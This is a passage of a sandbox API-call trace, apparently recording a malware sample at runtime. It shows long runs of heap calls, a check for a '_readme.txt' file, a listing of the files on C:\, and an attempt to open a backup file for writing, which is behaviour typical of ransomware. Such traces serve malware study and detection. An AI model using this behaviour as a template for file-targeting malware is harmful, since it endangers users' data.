dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.683] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.705] PathFindFileNameW (pszPath="") returned="" [0187.706] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0187.707] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0187.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0187.707] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0187.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0187.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.729] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0187.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e902a8 [0187.748] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0187.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0187.748] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0187.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.750] FindFirstFileW (in: lpFileName="C:\\*" (normalized: "c:\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2cfe100 [0187.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0187.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83fe8 [0187.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0187.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0187.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.773] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0187.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0187.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0187.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.775] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0187.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.775] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0187.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.775] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0187.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.775] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0187.775] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.780] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0187.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0187.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0187.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0187.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0187.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0187.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.782] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xc804cea0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0187.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.782] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0187.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.782] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xb883f1e0, ftCreationTime.dwHighDateTime=0x1d8a6e8, ftLastAccessTime.dwLowDateTime=0xb883f1e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xb883f1e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0187.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0187.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0187.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0187.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0187.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.784] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xc781e300, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0187.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.784] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0187.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.785] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0187.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f48 [0187.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0187.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.787] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9efab1d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9efab1d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0187.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0187.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0187.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.788] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, 